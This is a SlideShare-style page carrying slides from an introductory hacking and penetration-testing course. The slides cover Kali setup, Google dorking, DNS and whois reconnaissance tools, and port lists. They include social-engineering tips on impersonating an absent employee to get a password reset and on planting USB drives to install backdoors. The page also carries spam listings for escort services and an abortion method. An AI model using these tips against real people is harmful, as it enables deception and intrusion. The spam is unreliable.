Más contenido relacionado

La actualidad más candente

Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration TestingAndrew McNicol
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestSecuRing
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP SinghBipin Upadhyay
 
Flaying the Blockchain Ledger for Fun, Profit, and Hip Hop
Flaying the Blockchain Ledger for Fun, Profit, and Hip HopFlaying the Blockchain Ledger for Fun, Profit, and Hip Hop
Flaying the Blockchain Ledger for Fun, Profit, and Hip HopAndrew Morris
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestSecuRing
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellDaniel Bohannon
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the InternetAndrew Morris
 
Snake bites : Python for Pentesters
Snake bites : Python for PentestersSnake bites : Python for Pentesters
Snake bites : Python for PentestersAnant Shrivastava
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireJeremy Johnson
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 

La actualidad más candente (20)

Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration Testing
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
 
Flaying the Blockchain Ledger for Fun, Profit, and Hip Hop
Flaying the Blockchain Ledger for Fun, Profit, and Hip HopFlaying the Blockchain Ledger for Fun, Profit, and Hip Hop
Flaying the Blockchain Ledger for Fun, Profit, and Hip Hop
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShellPesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the Internet
 
Snake bites : Python for Pentesters
Snake bites : Python for PentestersSnake bites : Python for Pentesters
Snake bites : Python for Pentesters
 
Advanced Weapons Training for the Empire
Advanced Weapons Training for the EmpireAdvanced Weapons Training for the Empire
Advanced Weapons Training for the Empire
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT Signatures
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 

Similar a The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon

Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Codemotion
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CDSimon Bennetts
 
Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Vlad Styran
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101dc612
 
SplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security WorkshopSplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security WorkshopSplunk
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...B.A.
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchainjasonhaddix
 
From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...Yury Bushmelev
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
Drilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache DrillDrilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache DrillCharles Givre
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangChris McEniry
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
 

Similar a The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon (20)

Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
Security Testing with OWASP ZAP in CI/CD - Simon Bennetts - Codemotion Amster...
 
2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD2017 Codemotion OWASP ZAP in CI/CD
2017 Codemotion OWASP ZAP in CI/CD
 
Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
SplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security WorkshopSplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security Workshop
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
 
From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...
 
DIY Java Profiling
DIY Java ProfilingDIY Java Profiling
DIY Java Profiling
 
Security Onion
Security OnionSecurity Onion
Security Onion
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Drilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache DrillDrilling Cyber Security Data With Apache Drill
Drilling Cyber Security Data With Apache Drill
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 

Último

Double Revolving field theory-how the rotor develops torque
Double Revolving field theory-how the rotor develops torqueDouble Revolving field theory-how the rotor develops torque
Double Revolving field theory-how the rotor develops torqueBhangaleSonal
 
Online banking management system project.pdf
Online banking management system project.pdfOnline banking management system project.pdf
Online banking management system project.pdfKamal Acharya
 
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoorTop Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoordharasingh5698
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringmulugeta48
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfKamal Acharya
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756dollysharma2066
 
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Bookingroncy bisnoi
 
Thermal Engineering-R & A / C - unit - V
Thermal Engineering-R & A / C - unit - VThermal Engineering-R & A / C - unit - V
Thermal Engineering-R & A / C - unit - VDineshKumar4165
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfJiananWang21
 
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...tanu pandey
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTbhaskargani46
 
Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdfIntze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdfSuman Jyoti
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Call Girls in Nagpur High Profile
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Bookingdharasingh5698
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordAsst.prof M.Gokilavani
 

Último (20)

Double Revolving field theory-how the rotor develops torque
Double Revolving field theory-how the rotor develops torqueDouble Revolving field theory-how the rotor develops torque
Double Revolving field theory-how the rotor develops torque
 
Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024Water Industry Process Automation & Control Monthly - April 2024
Water Industry Process Automation & Control Monthly - April 2024
 
Online banking management system project.pdf
Online banking management system project.pdfOnline banking management system project.pdf
Online banking management system project.pdf
 
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoorTop Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
Top Rated Call Girls In chittoor 📱 {7001035870} VIP Escorts chittoor
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
 
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
FULL ENJOY Call Girls In Mahipalpur Delhi Contact Us 8377877756
 
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Walvekar Nagar Call Me 7737669865 Budget Friendly No Advance Booking
 
Thermal Engineering-R & A / C - unit - V
Thermal Engineering-R & A / C - unit - VThermal Engineering-R & A / C - unit - V
Thermal Engineering-R & A / C - unit - V
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdf
 
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
Bhosari ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For ...
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPT
 
Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdfIntze Overhead Water Tank Design by Working Stress - IS Method.pdf
Intze Overhead Water Tank Design by Working Stress - IS Method.pdf
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Ramesh Nagar Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete RecordCCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
CCS335 _ Neural Networks and Deep Learning Laboratory_Lab Complete Record
 
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak HamilCara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
 

The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon

  • 1. The basics of Hacking and Penetration Testing 이제 시작이야 해킹과 침투 테스트 Kenneth Kwon 철통보안 시리즈 005 Made in 20011 It’s based on “Backtrack 5“ Not Kali
  • 2. CHAPTER 1. Introduction All exmaples is based on ‘Backtrack 5’ It’s original book.
  • 3. White hat & Black hat • There are three big differences between them. 1. Authorization 2. Motivation 3. Intent Penetration testing & Vulnerability assessment • The difference between Penetration testing & Vulnerability assessment. - Vulnerability is to check and exam services and systems - Penetration testing has more steps than Vulnerability assessment need to show how it could be abused by attackers. Difference Difference
  • 4. Kali linux : Penetration testing Tool • Kali was called by ‘Backtrack’. But, now the name has been changed. • Easily can download by FREE!! https://www.kali.org/downloads/ (You should download from official site for safety.) PS. You can use any linux. But, need to setup lots of testing tools PS. There are other linux ditributions. : Matlinux, Fedora Security Spin, KATANA, STD, Pentoo, Blackbuntu etc. You can search the internet using keyword ‘Linux Penetration Testing Distributions’
  • 5. APT(Advanced Package Tool) • Easily, fast make us install a software by simple command prompt • Especially, with APT, can be free from “Dependency Hell problem!” • How to use? apt-get update apt-get install [Software name] ex) apt-get install Cheops • VMware Tools is very convenient. - Full Auto-fit screen, - Able to exchange files between real OS and VM OS.
  • 6. Kali linux : Start • Logon : Default user account ID : root / PW : toor (reverse type) • X-windows launch • root@bt~# startx • Terminal launch • #console or click icon • Network activate • #ifconfig : show interface which you be able to use • #ifconfig eth0 up : eth0 activate(up), bacsically off state for hide of tester • Network ip allocate • #ifconfig eth0 up 192.168.1.23 // allocate ip manually • #ifconfig // check ip setup. It’s necessary work after changing settting • Or #dhclient eth0 //allocate ip atumatically using DHCP • Shutdown • #poweroff or #reboot // ketword is ‘reboot’. But, fuction is same with ‘poweroff’ If your NIC is off, you need to turn it on Careful, It’s ‘ifconfig’. ‘ipconfig’ is in case of windows.
  • 7. Penetration test Methodology • ZEH (Zero Entry Hacking : Reverse triangle step table) Reconnaissance : 군사목적의 탐색 Scanning : Port, Vulnerability scannning Explitation Access Authority Holding : making ‘Backdoor’ 4 Step table Keep circulating 4 steps
  • 9. Reconnaissance • Active reconnaissance Gathering information using even directly scanning and approaching. It could remain your ip and activity logs. • Passive reconnaissance Gathering information using redirect ways ; internet, web searching, googling etc.
  • 10. Reconnaissance • Active reconnaissance Gathering information using even directly scanning and approaching. It could remain your ip and activity logs. • Passive reconnaissance Gathering information using redirect ways ; internet, web searching, googling etc.
  • 11. HTTrack : website copy tool • Entirely copy a target website using HTTrack • copied : all pages, link, picture, code etc. • gather information in offline circumstance for less traces. • Setup • Kali : # apt-get install webhttrack • Win : download ( http://www.httrack.com/ )
  • 12. Google Search Tip • Search operator • “site: “ • site:dsu.edu pat engebretson : search ‘pat engebretson’ in website ‘dsu.edu’ • “intitle:”, “alltitle” • allintitle: index of : when webpage’s title has ‘index of’ (only all) • intitle: index of : when webpage’s title has ‘index’ or ‘of’ (or) • “inurrl:” • inurl:admin : find url which has ‘admin’ words. It’s useful to find admin page or settting page!
  • 13. Google stored page • There is some stored pages. It’s collected by google’s web crawler. • These pages are based on text contents : web code, pdf, word, excel etc. • Even You deleted your data, it could be alive in google’s stored pages palce. If web crawler collected data before you erased it. • “cache:” • cache:syngress.com : search ‘syngress.com’ only in google’s stored pages place. • “filytype:” • site:dsu.edu filetype:ppt : find *.ppt in site ‘dsu.edu’ (ppt, xlsx,doc,txt etc) • % caution : when you clicked a url, it leave traces.
  • 14. Harvester : tool • Python scripts • Categorize e-mail and subdomains related with target. • Harvester search data from google, bing, PGP, LinkedIn etc • If you are not Kali, download from http://www.edge-security.com • And, #tar xf theHarvest • Launch • find ‘TheHarvester’ • or # cd /pentest/enumeration/google/theharvester • # ./thHarvester.py –d syngress.com –l 10 –b google • : search email, subdomain, host in syngress.com. • : -l(result numbers), -b(choose search engine)
  • 15. Whois : tool and site • Find information of ip, host name, company address, contact number from company DNS. • #whois syngress.com : whois [target_domain] • And go to http://www.whois.net and ‘WHOIS LOOKUP : syngress.com’ • Check ‘Referral URL: ‘
  • 16. Netcraft : tool and site • http://news.netcraft.com • What’s that site running : syngress : find website which has ‘syngress’ in name • Can see ip, webserver’s OS, DNS server etc.
  • 17. HOST : tool • Convert [hostname] and [IP address] • root@bt~@# host ns1.dreamhost.com : # host [target_hostname] • # host [IP address]
  • 18. NS lookup • Useful tool to investigate DNS • query to DNS and get info which DNS knows • It can be activated on interactive mode. • # nslookup • > server 8.8.8.8
  • 19. Dig • Tool for gathering information from DNS. • # dig @192.168.1.23 example.com –t AXFR • : try to DNS zone transfer(AXFR) from DNS server ‘192.168.1.23 example.com’ • AXFR works only when AXFR is available and not limited from DNS setting. • No matter is hard to success, Try it. That’s Reconnaissance process.
  • 20. MetaGooFil • Same inventors who made Harvester made MetaGooFil • Find hidden data what document has automatically ; owner, writer account, stored file location etc. • Use • MetaGooFil Icon • or cd /pentest/enumeration/google/metagoofil • mkdir files • ./metagoofil.py –d syngress.com –f all –o results –t files • : -d (target domain), -f (file type), -o (setting name which would be made), -t (storing location)
  • 21. Social Engineering Technique. • Contact sales department person using e-mail and check e-mail’s Header. • If he is on vacation, try to pretend him. • ex) “I lost my password, would you reset for me?” • Leave CD, USB near the company • Normally people are curious and tend to open them which could install backdoor.
  • 22. Reconnaissance Tip • Website information : merge schedule(another attack route), recruit board(System hardware info) • Use the Google! Google is web crawler. • Watch the Jonny Long’s video which can find in DefCon reference library. • Be a SNS friend. Someday you can find gold from what they saying • “I can’t go home tonight, Server is down! OMG!” like this. Sincerely it’s real. • Mail server could be main point for attack. Because people always use e-mail for their business. • So, there are many information. • As the step of pushing, you can send ‘empty *.bat, calc.exe etc’. • Then, mail server would reject them and send back. • In that case, sometimes there are vaccine company’s name, version and etc. • Also, could check e-mail’s header(IP, specific SW version, mail server brand etc)
  • 23. Extra recommend steps • SEAT(Search Engine Assessment Tool) • : use multi-serach engine at once. (www.midnightresearch.com) • GHDB(Good Hacking Database of Jonny Long) • : famous and effective website relate to hacking (www.hackersforcharity.org/dhdb) • Book : Google hacking for Penetration Testers of Jonny Long (Recommend) • Maltego CE : gather detail information from public/open based DB. This tool is easy and very useful (included in kali)
  • 24. CHAPTER 3. Scanning Steps 1. Running check 2. Port scanning 3. Vulnerability scanning Port No. 20 FTP 21 FTP control 22 SSH 23 Telnet 25 SMTP(e-mail) 53 DNS 80 Http 443 Https
